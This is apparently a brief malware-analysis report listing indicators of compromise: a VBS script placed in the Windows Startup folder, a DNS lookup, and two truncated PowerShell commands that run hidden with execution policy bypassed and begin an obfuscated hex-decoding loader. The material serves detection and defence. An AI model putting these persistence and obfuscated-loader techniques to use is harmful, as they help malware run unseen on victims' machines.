Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows.vbs
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK microsoft.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "function SADFLKASOKROKWEQR([string]$s){$jjjfhdfgg=@();for ($i=0;$i -lt $s.Length;$i+=2){$jjjfhdfgg+=[Byte]::Parse($s.Substring($i,2...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "function SADFLKASOKROKWEQR([string]$s){$jjjfhdfgg=@();for ($i=0;$i -lt $s.Length;$i+=2){$jjjfhdfgg+=[Byte]::Parse($s.Substring($i,2...